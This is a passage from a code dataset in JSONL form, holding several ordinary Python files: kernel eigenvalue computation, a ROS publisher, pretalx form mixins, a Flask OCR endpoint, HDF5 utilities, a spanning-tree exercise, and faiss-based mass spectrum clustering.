compute_upper(Xs, m1, m2, n1, n2)\n elif m1 > n1:\n K_kj = compute_lower(Xs, n1, n2, m1, m2)\n K_ks.append(K_kj)\n K_ks = np.hstack(K_ks)\n K.append(K_ks)\n K = np.vstack(K)\n return np.ones((m, m)) - coeff*K\n\ndef compute_diag(Xs, m1, m2):\n t1_11 = np.reshape(np.tile(Xs[m1:m2], m2-m1), (m2-m1, m2-m1, d))\n t2_11 = np.reshape(np.tile(Xs[m1:m2], (m2-m1, 1)), (m2-m1, m2-m1, d))\n return np.linalg.norm(t1_11 - t2_11, axis=2)\n\ndef compute_upper(Xs, m1, m2, n1, n2):\n t1_12 = np.reshape(np.tile(Xs[m1:m2], n2-n1), (m2-m1, n2-n1, d))\n t2_12 = np.reshape(np.tile(Xs[n1:n2], (m2-m1, 1)), (m2-m1, n2-n1, d))\n return np.linalg.norm(t1_12 - t2_12, axis=2)\n\ndef compute_lower(Xs, m1, m2, n1, n2):\n t1_21 = np.reshape(np.tile(Xs[n1:n2], m2-m1), (n2-n1, m2-m1, d))\n t2_21 = np.reshape(np.tile(Xs[m1:m2], (n2-n1, 1)), (n2-n1, m2-m1, d))\n return np.linalg.norm(t1_21 - t2_21, axis=2)\n\ndef sample_ball(d, n):\n X = np.random.normal(0.0, 1.0, (n, d))\n nrm = np.expand_dims(np.linalg.norm(X, axis=1), axis=1)\n X = np.divide(X, nrm)\n U = np.random.uniform(0, 1, n)**(1/float(d))\n U = np.expand_dims(U, axis=1)\n return np.multiply(X, U).T\n\n\ndef compute_covariance_matrix1d(Xs):\n \"\"\"\n Compute the covariance matrix from the kernel function.\n Xs: array [X_0, X_1, ..., X_T]\n sigma_2: variance of noise\n \"\"\"\n m, d = Xs.shape\n t1 = np.reshape(np.tile(Xs, m), (m, m, d))\n t2 = np.reshape(np.tile(Xs, (m, 1)), (m, m, d))\n K1 = np.abs(t1 - t2)\n K1 = np.reshape(K1, (m, m))\n coeff = 1.0\n Sigma = np.ones((m, m)) - coeff*K1\n return Sigma\n\n\n\nds = [2, 5, 10, 20, 50, 100, 200, 500]\nt = 15000\ncoeffs = [0.1, 0.2, 0.3, 0.4]\nroot = Path(\".\")\n\nfor d in ds:\n for coeff in coeffs:\n np.random.seed(1)\n Xs = sample_ball(d, t)\n print('d: %s, coeff: %s'%(d, coeff))\n print('Assembling Kernel Matrix')\n s_time = time.time()\n Sigma = compute_covariance_matrix_massive(Xs.T, 50, coeff)\n e_time = time.time()\n print('Took %s Seconds to Assemble Matrix'%(e_time - s_time))\n print('Computing Eigenvalues')\n s_time2 = time.time()\n eig_vals = np.linalg.eigvalsh(Sigma/float(t))\n e_time2 = time.time()\n filename = 'eig_vals_d%s_t%s_c%s.pkl'%(d, t, coeff)\n eigvals_filename = root / \"pickle\" / filename\n with open(eigvals_filename, 'wb') as handle:\n pickle.dump(eig_vals, handle)\n print('Took %s Seconds to Compute Eigenvalues'%(e_time2 - s_time2))","sub_path":"scaling_factor.py","file_name":"scaling_factor.py","file_ext":"py","file_size_in_byte":3963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"235547431","text":"#!/usr/bin/env python\n\nimport rospy\nimport random\n#from std_msgs.msg import Int64\n#from std_msgs.msg import Int64MultiArray\nfrom std_msgs.msg import Int64\nfrom std_msgs.msg import String\nimport json\n\nnode_name = \"pub1\"\ntags = [\"RL\",\"RR\",\"FL\",\"FR\"]\nnodes = []\nnode_count = 0\ntag = \"FL\"\n\n\ndef talker():\n\tglobal nodes\n\tglobal node_count\n\tglobal tag\n\trospy.init_node('pub', anonymous=True)\n\tnode_count = int ( rospy.get_param(\"~node_count\",node_count) )\n\ttag = str ( rospy.get_param(\"~tag\",tag) )\n\tpub = rospy.Publisher(\"/data/\"+tag, String, queue_size=10)\n\trate = rospy.Rate(1)\n\t\n\twhile not rospy.is_shutdown():\n\t\tmsg = String()\n\t\tdata = random.randint(400,8000)\n\t\tjs = {\"tag\":tag, \"CO2\":data}\n\t\tmsg = json.dumps(js)\n\t\trospy.loginfo(\"Sent: %s\",msg)\n\t\tpub.publish(msg)\n\t\trate.sleep()\n\ndef multi_talker():\n\tglobal nodes\n\tglobal node_count\n\trospy.init_node('pub', anonymous=True)\n\tnode_count = int ( rospy.get_param(\"~node_count\",node_count) )\n\tfor n in range(node_count):\n\t\ttmp = rospy.Publisher(\"/data/\"+tags[n], String, queue_size=10)\n\t\tnodes.append(tmp)\n\trate = rospy.Rate(1)\n\twhile not rospy.is_shutdown():\n\t\tfor n in range(node_count):\n\t\t\tmsg = String()\n\t\t\tdata = random.randint(400,8000)\n\t\t\tjs = {\"tag\":tags[n], \"CO2\":data}\n\t\t\tmsg = json.dumps(js)\n\t\t\trospy.loginfo(\"Sent: %s\",msg)\n\t\t\tnodes[n].publish(msg)\n\t\trate.sleep()\n\nif __name__ == '__main__':\n\ttry:\n\t\ttalker()\n\texcept rospy.ROSInterruptException:\n\t\tpass\n","sub_path":"final_senior_ws/src/ardrone_tutorials/src/pub.py","file_name":"pub.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"624521101","text":"from decimal import Decimal\nfrom functools import partial\n\nfrom django import forms\nfrom django.core.files.uploadedfile import UploadedFile\nfrom django.utils.translation import gettext_lazy as _\n\nfrom pretalx.common.forms.utils import get_help_text, validate_field_length\nfrom pretalx.common.phrases import phrases\nfrom pretalx.common.templatetags.rich_text import rich_text\n\n\nclass ReadOnlyFlag:\n def __init__(self, *args, read_only=False, **kwargs):\n super().__init__(*args, **kwargs)\n self.read_only = read_only\n if read_only:\n for field in self.fields.values():\n field.disabled = True\n\n def clean(self):\n if self.read_only:\n raise forms.ValidationError(_(\"You are trying to change read-only data.\"))\n return super().clean()\n\n\nclass PublicContent:\n\n public_fields = []\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field_name in self.Meta.public_fields:\n field = self.fields.get(field_name)\n if field:\n field.original_help_text = getattr(field, \"original_help_text\", \"\")\n field.added_help_text = getattr(field, \"added_help_text\", \"\") + str(\n phrases.base.public_content\n )\n field.help_text = field.original_help_text + \" \" + field.added_help_text\n\n\nclass RequestRequire:\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n count_chars = self.event.settings.cfp_count_length_in == \"chars\"\n for key in self.Meta.request_require:\n request = self.event.settings.get(f\"cfp_request_{key}\")\n require = self.event.settings.get(f\"cfp_require_{key}\")\n if not request and not require:\n self.fields.pop(key)\n else:\n field = self.fields[key]\n field.required = require\n min_value = self.event.settings.get(f\"cfp_{key}_min_length\")\n max_value = self.event.settings.get(f\"cfp_{key}_max_length\")\n if min_value or max_value:\n if min_value and count_chars:\n field.widget.attrs[f\"minlength\"] = min_value\n if max_value and count_chars:\n field.widget.attrs[f\"maxlength\"] = max_value\n field.validators.append(\n partial(\n validate_field_length,\n min_length=min_value,\n max_length=max_value,\n count_in=self.event.settings.cfp_count_length_in,\n )\n )\n field.original_help_text = getattr(field, \"original_help_text\", \"\")\n field.added_help_text = get_help_text(\n \"\",\n min_value,\n max_value,\n self.event.settings.cfp_count_length_in,\n )\n field.help_text = (\n field.original_help_text + \" \" + field.added_help_text\n )\n\n\nclass QuestionFieldsMixin:\n def get_field(self, *, question, initial, initial_object, readonly):\n from pretalx.submission.models import QuestionVariant\n\n original_help_text = question.help_text\n help_text = rich_text(question.help_text)\n if question.is_public:\n help_text += \" \" + str(phrases.base.public_content)\n count_chars = self.event.settings.cfp_count_length_in == \"chars\"\n if question.variant == QuestionVariant.BOOLEAN:\n # For some reason, django-bootstrap4 does not set the required attribute\n # itself.\n widget = (\n forms.CheckboxInput(attrs={\"required\": \"required\", \"placeholder\": \"\"})\n if question.required\n else forms.CheckboxInput()\n )\n\n field = forms.BooleanField(\n disabled=readonly,\n help_text=help_text,\n label=question.question,\n required=question.required,\n widget=widget,\n initial=(initial == \"True\")\n if initial\n else bool(question.default_answer),\n )\n field.original_help_text = original_help_text\n return field\n if question.variant == QuestionVariant.NUMBER:\n field = forms.DecimalField(\n disabled=readonly,\n help_text=help_text,\n label=question.question,\n required=question.required,\n min_value=Decimal(\"0.00\"),\n initial=initial,\n )\n field.original_help_text = original_help_text\n field.widget.attrs[\"placeholder\"] = \"\" # XSS\n return field\n if question.variant == QuestionVariant.STRING:\n field = forms.CharField(\n disabled=readonly,\n help_text=get_help_text(\n help_text,\n question.min_length,\n question.max_length,\n self.event.settings.cfp_count_length_in,\n ),\n label=question.question,\n required=question.required,\n initial=initial,\n min_length=question.min_length if count_chars else None,\n max_length=question.max_length if count_chars else None,\n )\n field.original_help_text = original_help_text\n field.widget.attrs[\"placeholder\"] = \"\" # XSS\n field.validators.append(\n partial(\n validate_field_length,\n min_length=question.min_length,\n max_length=question.max_length,\n count_in=self.event.settings.cfp_count_length_in,\n )\n )\n return field\n if question.variant == QuestionVariant.TEXT:\n field = forms.CharField(\n label=question.question,\n required=question.required,\n widget=forms.Textarea,\n disabled=readonly,\n help_text=get_help_text(\n help_text,\n question.min_length,\n question.max_length,\n self.event.settings.cfp_count_length_in,\n ),\n initial=initial,\n min_length=question.min_length if count_chars else None,\n max_length=question.max_length if count_chars else None,\n )\n field.validators.append(\n partial(\n validate_field_length,\n min_length=question.min_length,\n max_length=question.max_length,\n count_in=self.event.settings.cfp_count_length_in,\n )\n )\n field.original_help_text = original_help_text\n field.widget.attrs[\"placeholder\"] = \"\" # XSS\n return field\n if question.variant == QuestionVariant.FILE:\n field = forms.FileField(\n label=question.question,\n required=question.required,\n disabled=readonly,\n help_text=help_text,\n initial=initial,\n )\n field.original_help_text = original_help_text\n field.widget.attrs[\"placeholder\"] = \"\" # XSS\n return field\n if question.variant == QuestionVariant.CHOICES:\n choices = question.options.all()\n field = forms.ModelChoiceField(\n queryset=choices,\n label=question.question,\n required=question.required,\n empty_label=None,\n initial=initial_object.options.first()\n if initial_object\n else question.default_answer,\n disabled=readonly,\n help_text=help_text,\n widget=forms.RadioSelect if len(choices) < 4 else None,\n )\n field.original_help_text = original_help_text\n field.widget.attrs[\"placeholder\"] = \"\" # XSS\n return field\n if question.variant == QuestionVariant.MULTIPLE:\n field = forms.ModelMultipleChoiceField(\n queryset=question.options.all(),\n label=question.question,\n required=question.required,\n widget=forms.CheckboxSelectMultiple,\n initial=initial_object.options.all()\n if initial_object\n else question.default_answer,\n disabled=readonly,\n help_text=help_text,\n )\n field.original_help_text = original_help_text\n field.widget.attrs[\"placeholder\"] = \"\" # XSS\n return field\n return None\n\n def save_questions(self, k, v):\n \"\"\"Receives a key and value from cleaned_data.\"\"\"\n from pretalx.submission.models import Answer, QuestionTarget\n\n field = self.fields[k]\n if field.answer:\n # We already have a cached answer object, so we don't\n # have to create a new one\n if v == \"\" or v is None:\n field.answer.delete()\n else:\n self._save_to_answer(field, field.answer, v)\n field.answer.save()\n elif v != \"\" and v is not None:\n answer = Answer(\n review=self.review\n if field.question.target == QuestionTarget.REVIEWER\n else None,\n submission=self.submission\n if field.question.target == QuestionTarget.SUBMISSION\n else None,\n person=self.speaker\n if field.question.target == QuestionTarget.SPEAKER\n else None,\n question=field.question,\n )\n self._save_to_answer(field, answer, v)\n answer.save()\n\n def _save_to_answer(self, field, answer, value):\n if isinstance(field, forms.ModelMultipleChoiceField):\n answstr = \", \".join([str(o) for o in value])\n if not answer.pk:\n answer.save()\n else:\n answer.options.clear()\n answer.answer = answstr\n if value:\n answer.options.add(*value)\n elif isinstance(field, forms.ModelChoiceField):\n if not answer.pk:\n answer.save()\n else:\n answer.options.clear()\n if value:\n answer.options.add(value)\n answer.answer = value.answer\n else:\n answer.answer = \"\"\n elif isinstance(field, forms.FileField):\n if isinstance(value, UploadedFile):\n answer.answer_file.save(value.name, value)\n answer.answer = \"file://\" + value.name\n value = answer.answer\n else:\n answer.answer = value\n","sub_path":"src/pretalx/common/mixins/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":11116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"183040998","text":"\n# 2.给出一个数n,打印0+1+2+3+.....+n的值\n# 说明:争取用函数来做\nn = int(input('输入数字'))\ndef mysum(n):\n y = 0\n for x in range(n + 1):\n y += x\n return y\n\nprint(mysum(n))","sub_path":"aid1807a/练习题/python练习题/python基础习题/10/zuoye2.py","file_name":"zuoye2.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"447416836","text":"# -*- coding:utf-8 -*-\n# @author :adolf\nimport json\nfrom flask import Flask\nfrom flask import request\nimport traceback\nfrom rpa_ocr.verification_service.verification_main import ocr_pipeline_main\nfrom flask_cors import CORS\n\n\"\"\"\nsupport ocr服务\n\"\"\"\napp = Flask(__name__)\nCORS(app, resources=r'/*')\n\n\n@app.route('/verification_service/', methods=[\"post\", \"get\"], strict_slashes=False)\ndef service_main():\n try:\n in_json = request.get_data()\n if in_json is not None:\n in_dict = json.loads(in_json.decode(\"utf-8\"))\n image_with_base64 = in_dict['image']\n scenes = in_dict['scenes']\n\n result_dict = dict()\n result = ocr_pipeline_main(image_with_base64, scenes)\n result_dict['result'] = result\n\n return json.dumps(result_dict, ensure_ascii=False)\n else:\n return json.dumps({\"error_msg\": \"data is None\", \"status\": 1}, ensure_ascii=False)\n except Exception as e:\n traceback.print_exc()\n return json.dumps({\"error_msg\": \"unknown error:\" + repr(e), \"status\": 1}, ensure_ascii=False)\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=2001, debug=False)\n","sub_path":"rpa_ocr/verification_service/main_service.py","file_name":"main_service.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"213773708","text":"# python3\nfrom math import sqrt\n\npoints = []\nedges = {}\nparents = []\nres = []\n\ndef union(a, b):\n ap = parents[a]\n bp = parents[b]\n if ap < bp:\n for i in range(bp, len(points)):\n if parents[i] == bp:\n parents[i] = ap\n if parents[a] > parents[b]:\n for i in range(ap, len(points)):\n if parents[i] == ap:\n parents[i] = bp\n return\n\ndef append_edge(a, b, w):\n if not edges.keys().__contains__(w):\n edges[w] = []\n edges[w].append((a, b))\n return\n\ndef remove_edge(e, w):\n edges[w].remove(e)\n if len(edges[w]) == 0:\n edges.__delitem__(w)\n return\n\ndef append_point(x, y):\n l = len(points)\n for i in range(l):\n point = points[i]\n x0 = (x - point[0]) * (x - point[0])\n y0 = (y - point[1]) * (y - point[1])\n w = sqrt(x0 + y0)\n append_edge(i, l, w)\n points.append((x, y))\n return\n\nif __name__ == '__main__':\n n = int(input())\n for i in range(n):\n str = input().split()\n x = int(str[0])\n y = int(str[1])\n append_point(x, y)\n parents.append(i)\n counter = 0\n result = 0\n while counter < n - 1:\n w = min(edges.keys())\n e = edges[w][0]\n if parents[e[0]] != parents[e[1]]:\n union(e[0], e[1])\n result += w\n counter += 1\n res.append(e)\n remove_edge(e, w)\n print(result)","sub_path":"src/main/python/_3_algorithms_on_graphs/_5_minimum_spanning_trees/mst.py","file_name":"mst.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"466911066","text":"import h5py\nimport numpy as np\nfrom .utils import smartIndexWrapper\n\ndef h5Print(data, level=0):\n\tif type(data) in (h5py._hl.files.File, h5py._hl.group.Group):\n\t\tfor key in data:\n\t\t\tprint(\"\\n%s- %s\" % (\" \" * level, key), end=\"\")\n\t\t\th5Print(data[key], level=level+1)\n\telif type(data) == h5py._hl.dataset.Dataset:\n\t\tprint(\"Shape: %s. Type: %s\" % (data.shape, data.dtype), end=\"\")\n\telse:\n\t\tassert False, \"Unexpected type %s\" % (type(data))\n\ndef h5StoreDict(file, data):\n\tassert type(data) == dict\n\tfor key in data:\n\t\t# If key is int, we need to convert it to Str, so we can store it in h5 file.\n\t\tsKey = str(key) if type(key) == int else key\n\n\t\tif type(data[key]) == dict:\n\t\t\tfile.create_group(sKey)\n\t\t\th5StoreDict(file[sKey], data[key])\n\t\telse:\n\t\t\tfile[sKey] = data[key]\n\ndef h5ReadDict(data, N=None):\n\tif type(data) in (h5py._hl.files.File, h5py._hl.group.Group):\n\t\tres = {}\n\t\tfor key in data:\n\t\t\tres[key] = h5ReadDict(data[key], N=N)\n\telif type(data) == h5py._hl.dataset.Dataset:\n\t\tif N is None:\n\t\t\tres = data[()]\n\t\telif type(N) is int:\n\t\t\tres = data[0 : N]\n\t\telif type(N) in (list, np.ndarray):\n\t\t\tres = smartIndexWrapper(data, N)\n\telse:\n\t\tassert False, \"Unexpected type %s\" % (type(data))\n\treturn res\n","sub_path":"neural_wrappers/utilities/h5_utils.py","file_name":"h5_utils.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"572445351","text":"# book page 371\n# instace로 접근할 때에는 scoping rule을 따르지만, method(member function)으로 접근 할때에는 전역변수부터 찾음.\nvar = 777\n\nclass Test2():\n\t#var = 777\t\n\tdef method1(self):\n\t\tprint(var)\n\ninst = Test2()\ninst.method1()","sub_path":"class6.py","file_name":"class6.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"553102483","text":"import gc\nimport logging\nimport math\nimport os\nfrom typing import Iterator, List, Optional, Tuple\n\nimport faiss\nimport joblib\nimport numba as nb\nimport numpy as np\nimport pandas as pd\nimport scipy.sparse as ss\nimport spectrum_utils.utils as suu\nimport tqdm\nfrom scipy.cluster.hierarchy import fcluster\n# noinspection PyProtectedMember\nfrom sklearn.cluster._dbscan_inner import dbscan_inner\n\nfrom gleams import config\n\n\nlogger = logging.getLogger('gleams')\n\n\ndef _check_ann_config() -> None:\n \"\"\"\n Make sure that the configuration values adhere to the limitations imposed\n by running Faiss on a GPU.\n GPU indexes can only handle maximum 1024 probes and neighbors.\n https://github.com/facebookresearch/faiss/wiki/Faiss-on-the-GPU#limitations\n \"\"\"\n if config.num_probe > 1024:\n logger.warning('Using num_probe=1024 (maximum supported value for '\n 'GPU-enabled ANN indexing), %d was supplied',\n config.num_probe)\n config.num_probe = 1024\n if config.num_neighbors > 1024:\n logger.warning('Using num_neighbours=1024 (maximum supported value '\n 'for GPU-enabled ANN indexing), %d was supplied',\n config.num_neighbors)\n config.num_neighbors = 1024\n\n\n_check_ann_config()\n\n\ndef compute_pairwise_distances(embeddings_filename: str,\n metadata_filename: str,\n charges: Optional[Tuple[int]] = None) -> None:\n \"\"\"\n Compute a pairwise distance matrix for the embeddings in the given file.\n\n Parameters\n ----------\n embeddings_filename : str\n NumPy file containing the embedding vectors for which to compute\n pairwise distances.\n metadata_filename : str\n Metadata file with precursor m/z information for all embeddings.\n charges : Optional[Tuple[int]]\n Optional tuple of minimum and maximum precursor charge (both inclusive)\n to include, spectra with other precursor charges will be omitted.\n \"\"\"\n cluster_dir = os.path.join(os.environ['GLEAMS_HOME'], 'data', 'cluster')\n if not os.path.exists(cluster_dir):\n os.mkdir(cluster_dir)\n ann_dir = os.path.join(cluster_dir, 'ann')\n if not os.path.exists(ann_dir):\n os.mkdir(ann_dir)\n index_filename = os.path.splitext(\n os.path.basename(embeddings_filename))[0].replace('embed_', 'ann_')\n index_filename = os.path.join(ann_dir, index_filename + '_{}_{}.faiss')\n dist_filename = (os.path.splitext(\n os.path.basename(embeddings_filename))[0].replace('embed_', 'dist_'))\n dist_filename = os.path.join(cluster_dir, f'{dist_filename}.npz')\n neighbors_filename = (dist_filename.replace('dist_', 'neighbors_{}_')\n .replace('.npz', '.npy'))\n embeddings_dist_filename = os.path.join(\n cluster_dir, os.path.basename(embeddings_filename))\n metadata_dist_filename = os.path.join(\n cluster_dir, os.path.basename(metadata_filename))\n if (os.path.isfile(dist_filename) and\n os.path.isfile(embeddings_dist_filename) and\n os.path.isfile(metadata_dist_filename)):\n return\n metadata = pd.read_parquet(metadata_filename).sort_values(['charge', 'mz'])\n metadata = metadata[metadata['charge'].isin(\n np.arange(charges[0], charges[1] + 1))].reset_index()\n num_embeddings = len(metadata)\n if num_embeddings > np.iinfo(np.int64).max:\n raise OverflowError('Too many embedding indexes to fit into int64')\n # Sort the embeddings and metadata in the same order as the pairwise\n # distance matrix.\n index, charge_mz = metadata['index'], metadata[['charge', 'mz']]\n logger.debug('Save the metadata to file %s', metadata_dist_filename)\n metadata.drop(columns='index', inplace=True)\n metadata.to_parquet(metadata_dist_filename, index=False)\n embeddings = np.load(embeddings_filename, mmap_mode='r')[index]\n logger.debug('Save the reordered embeddings to file %s',\n embeddings_dist_filename)\n np.save(embeddings_dist_filename, embeddings)\n min_mz, max_mz = charge_mz['mz'].min(), charge_mz['mz'].max()\n mz_splits = np.arange(\n math.floor(min_mz / config.mz_interval) * config.mz_interval,\n math.ceil(max_mz / config.mz_interval) * config.mz_interval,\n config.mz_interval)\n # Calculate pairwise distances.\n logging.info('Compute pairwise distances between neighboring embeddings '\n '(%d embeddings, %d neighbors)', num_embeddings,\n config.num_neighbors)\n if (not os.path.isfile(neighbors_filename.format('data')) or\n not os.path.isfile(neighbors_filename.format('indices')) or\n not os.path.isfile(neighbors_filename.format('indptr'))):\n # Create the ANN indexes (if this hasn't been done yet).\n _build_ann_index(index_filename, embeddings,\n charge_mz[['charge', 'mz']], mz_splits)\n max_num_embeddings = embeddings.shape[0] * config.num_neighbors\n dtype = (np.int32 if max_num_embeddings < np.iinfo(np.int32).max\n else np.int64)\n distances = np.zeros(max_num_embeddings, np.float32)\n indices = np.zeros(max_num_embeddings, dtype)\n indptr = np.zeros(num_embeddings + 1, dtype)\n with tqdm.tqdm(total=charge_mz['charge'].nunique() * len(mz_splits),\n desc='Distances calculated', unit='index') as pbar:\n for charge, precursors_charge in (charge_mz[['charge', 'mz']]\n .groupby('charge')):\n for mz in mz_splits:\n _dist_mz_interval(\n index_filename, embeddings, precursors_charge['mz'],\n distances, indices, indptr, charge, mz)\n pbar.update(1)\n distances, indices = distances[:indptr[-1]], indices[:indptr[-1]]\n np.save(neighbors_filename.format('data'), distances)\n np.save(neighbors_filename.format('indices'), indices)\n np.save(neighbors_filename.format('indptr'), indptr)\n else:\n distances = np.load(neighbors_filename.format('data'))\n indices = np.load(neighbors_filename.format('indices'))\n indptr = np.load(neighbors_filename.format('indptr'))\n # Convert to a sparse pairwise distance matrix. This matrix might not be\n # entirely symmetrical, but that shouldn't matter too much.\n logger.debug('Construct pairwise distance matrix')\n pairwise_dist_matrix = ss.csr_matrix(\n (distances, indices, indptr), (num_embeddings, num_embeddings),\n np.float32, False)\n logger.debug('Save the pairwise distance matrix to file %s', dist_filename)\n ss.save_npz(dist_filename, pairwise_dist_matrix, False)\n logger.debug('Clean up temporary pairwise distance files %s',\n neighbors_filename)\n os.remove(neighbors_filename.format('data'))\n os.remove(neighbors_filename.format('indices'))\n os.remove(neighbors_filename.format('indptr'))\n\n\ndef _build_ann_index(index_filename: str, embeddings: np.ndarray,\n precursors: pd.DataFrame, mz_splits: np.ndarray) -> None:\n \"\"\"\n Create ANN indexes for the given embedding vectors.\n\n Vectors will be split over multiple ANN indexes based on the given m/z\n interval.\n\n Parameters\n ----------\n index_filename: str\n Base file name of the ANN index. Separate indexes for the given m/z\n splits will be created.\n embeddings: np.ndarray\n The embedding vectors to build the ANN index.\n precursors : pd.DataFrame\n Precursor charges and m/z's corresponding to the embedding vectors used\n to split the embeddings over multiple ANN indexes per charge and m/z\n interval.\n mz_splits: np.ndarray\n M/z splits used to create separate ANN indexes.\n \"\"\"\n logger.debug('Use %d GPUs for ANN index construction',\n faiss.get_num_gpus())\n # Create separate indexes per precursor charge and with precursor m/z in\n # the specified intervals.\n with tqdm.tqdm(total=precursors['charge'].nunique() * len(mz_splits),\n desc='Indexes built', unit='index') as progressbar:\n for charge, precursors_charge in precursors.groupby('charge'):\n for mz in mz_splits:\n progressbar.update(1)\n if os.path.isfile(index_filename.format(charge, mz)):\n continue\n # Create an ANN index using Euclidean distance\n # for fast NN queries.\n start_i, stop_i = _get_precursor_mz_interval_ids(\n precursors_charge['mz'].values, mz, config.mz_interval,\n config.precursor_tol_mode, config.precursor_tol_mass)\n index_embeddings_ids = (precursors_charge.index\n .values[start_i:stop_i])\n num_index_embeddings = len(index_embeddings_ids)\n # Figure out a decent value for the num_list hyperparameter\n # based on the number of embeddings.\n # Rules of thumb from the Faiss wiki:\n # https://github.com/facebookresearch/faiss/wiki/Guidelines-to-choose-an-index#how-big-is-the-dataset\n if num_index_embeddings == 0:\n continue\n if num_index_embeddings < 10e2:\n # Use a brute-force index instead of an ANN index\n # when there are only a few items.\n num_list = -1\n elif num_index_embeddings < 10e5:\n num_list = 2**math.floor(math.log2(\n num_index_embeddings / 39))\n elif num_index_embeddings < 10e6:\n num_list = 2**16\n elif num_index_embeddings < 10e7:\n num_list = 2**18\n else:\n num_list = 2**20\n if num_index_embeddings > 10e8:\n logger.warning('More than 1B embeddings to be indexed,'\n ' consider decreasing the ANN size')\n logger.debug('Build the ANN index for precursor charge %d and '\n 'precursor m/z %d–%d (%d embeddings, %d lists)',\n charge, int(mz), int(mz + config.mz_interval),\n num_index_embeddings, num_list)\n # Create a suitable index and compute cluster centroids.\n if num_list <= 0:\n index = faiss.IndexIDMap(\n faiss.IndexFlatL2(config.embedding_size))\n else:\n index = faiss.IndexIVFFlat(\n faiss.IndexFlatL2(config.embedding_size),\n config.embedding_size, num_list, faiss.METRIC_L2)\n index_embeddings = embeddings[index_embeddings_ids]\n # noinspection PyArgumentList\n index.train(index_embeddings)\n # Add the embeddings to the index in batches.\n logger.debug('Add %d embeddings to the ANN index',\n num_index_embeddings)\n batch_size = min(num_index_embeddings, config.batch_size_add)\n for batch_start in range(0, num_index_embeddings, batch_size):\n batch_stop = min(batch_start + batch_size,\n num_index_embeddings)\n # noinspection PyArgumentList\n index.add_with_ids(\n index_embeddings[batch_start:batch_stop],\n index_embeddings_ids[batch_start:batch_stop])\n # Save the index to disk.\n logger.debug('Save the ANN index to file %s',\n index_filename.format(charge, mz))\n faiss.write_index(index, index_filename.format(charge, mz))\n index.reset()\n\n\ndef _dist_mz_interval(index_filename: str, embeddings: np.ndarray,\n precursor_mzs: pd.Series, distances: np.ndarray,\n indices: np.ndarray, indptr: np.ndarray, charge: int,\n mz: int) -> None:\n \"\"\"\n Compute distances to the nearest neighbors for the given precursor m/z\n interval.\n\n Parameters\n ----------\n index_filename: str\n Base file name of the ANN index. The specific index for the given m/z\n will be used.\n embeddings: np.ndarray\n The embedding vectors.\n precursor_mzs: pd.Series\n Precursor m/z's corresponding to the embedding vectors.\n distances : np.ndarray\n The nearest neighbor distances.\n See `scipy.sparse.csr_matrix` (`data`).\n indices : np.ndarray\n The column indices for the nearest neighbor distances.\n See `scipy.sparse.csr_matrix`.\n indptr : np.ndarray\n The index pointers for the nearest neighbor distances.\n See `scipy.sparse.csr_matrix`.\n charge : int\n The active precursor charge to load the ANN index.\n mz : int\n The active precursor m/z split to load the ANN index.\n \"\"\"\n if not os.path.isfile(index_filename.format(charge, mz)):\n return\n index = _load_ann_index(index_filename.format(charge, mz))\n start_i, stop_i = _get_precursor_mz_interval_ids(\n precursor_mzs.values, mz, config.mz_interval, None, 0)\n for batch_start in range(start_i, stop_i, config.batch_size_dist):\n batch_stop = min(batch_start + config.batch_size_dist, stop_i)\n batch_ids = precursor_mzs.index.values[batch_start:batch_stop]\n # Find nearest neighbors using ANN index searching.\n # noinspection PyArgumentList\n nn_dists, nn_idx_ann = index.search(\n embeddings[batch_ids], config.num_neighbors_ann)\n # Filter the neighbors based on the precursor m/z tolerance and assign\n # distances.\n _filter_neighbors_mz(\n precursor_mzs.values, precursor_mzs.index.values, batch_start,\n batch_stop, config.precursor_tol_mass, config.precursor_tol_mode,\n nn_dists, nn_idx_ann, config.num_neighbors, distances, indices,\n indptr)\n index.reset()\n\n\ndef _load_ann_index(index_filename: str) -> faiss.Index:\n \"\"\"\n Load the ANN index from the given file.\n\n Parameters\n ----------\n index_filename : str\n The ANN index filename.\n\n Returns\n -------\n faiss.Index\n The Faiss `Index`.\n \"\"\"\n index = faiss.read_index(index_filename)\n # IndexIVF has a `nprobe` hyperparameter, flat indexes don't.\n if hasattr(index, 'nprobe'):\n index.nprobe = min(math.ceil(index.nlist / 2), config.num_probe)\n return index\n\n\n@nb.njit\ndef _get_precursor_mz_interval_ids(precursor_mzs: np.ndarray, start_mz: float,\n mz_window: float,\n precursor_tol_mode: Optional[str],\n precursor_tol_mass: float) -> \\\n Tuple[int, int]:\n \"\"\"\n Get the IDs of the embeddings falling within the specified precursor m/z\n interval (taking a small margin for overlapping intervals into account).\n\n Parameters\n ----------\n precursor_mzs : np.ndarray\n Array of sorted precursor m/z's.\n start_mz : float\n The lower end of the m/z interval.\n mz_window : float\n The width of the m/z interval.\n precursor_tol_mode : Optional[str]\n The unit of the precursor m/z tolerance ('Da' or 'ppm').\n precursor_tol_mass : float\n The value of the precursor m/z tolerance.\n\n Returns\n -------\n Tuple[int, int]\n The start and stop index of the embedding identifiers falling within\n the specified precursor m/z interval.\n \"\"\"\n if precursor_tol_mode == 'Da':\n margin = precursor_tol_mass\n elif precursor_tol_mode == 'ppm':\n margin = precursor_tol_mass * start_mz / 10**6\n else:\n margin = 0\n if margin > 0:\n margin = max(margin, mz_window / 100)\n idx = np.searchsorted(precursor_mzs, [start_mz - margin,\n start_mz + mz_window + margin])\n return idx[0], idx[1]\n\n\n@nb.njit\ndef 